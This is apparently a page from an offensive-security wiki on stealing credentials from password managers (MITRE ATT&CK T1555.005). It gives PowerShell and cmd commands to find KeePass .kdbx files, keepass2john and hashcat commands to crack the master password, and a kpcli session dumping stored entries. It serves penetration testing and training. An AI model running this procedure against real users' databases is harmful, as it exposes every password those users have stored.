Infiltr8 Forum GitHub

Password managers

MITRE ATT&CK™ Credentials from Password Stores: Password Managers - Technique T1555.005

Theory

Password managers generate and securely store passwords of various services, safeguarding them under a single master password. This master password serves as the key to access all the stored passwords within the password manager.

Examples of Password Manager applications:

However, misconfiguration and security flaws are found in these applications that let us access stored data. Various tools could be used during the enumeration stage to get sensitive data in password manager applications used by Internet browsers and desktop applications.

Practice

KeePass

Cracking Master Password

If we gained access to the keepass database, we may be able to extract it and crack the master database password.

Keepass database is stored as a .kdbx file, we can search for such files using following commands:

#PowerShell
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue

#Cmd
dir /s /b C:\*.kdbx

One we exfiltrate the database to our attacking computer, we can start by using keepass2john and save the output hase a crackable hash.

keepass2john keepass.kdbx > keepass.hash

Then, we may crack the master password using hashcat. See this page for more details about cracking passwords.

hashcat -a 0 -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt --user

Now, we can open the database using kpcli and dump passwords

$ kpcli --kdb=db.kdbx
Provide the master password: *************************
kpcli:/> dir
=== Groups ===
Database/

kpcli:/> cd Database
kpcli:/Database> dir
=== Groups ===
eMail/
General/
Homebanking/
Internet/
Network/
Windows/
=== Entries ===
0. Sample Entry                                               keepass.info
1. Sample Entry #2                          keepass.info/help/kb/testform.
2. User Company Password

kpcli:/Database> show -f 0
Title: Sample Entry
Uname: User Name
 Pass: Password
  URL: https://keepass.info/
Notes: Notes

Resources

Last updated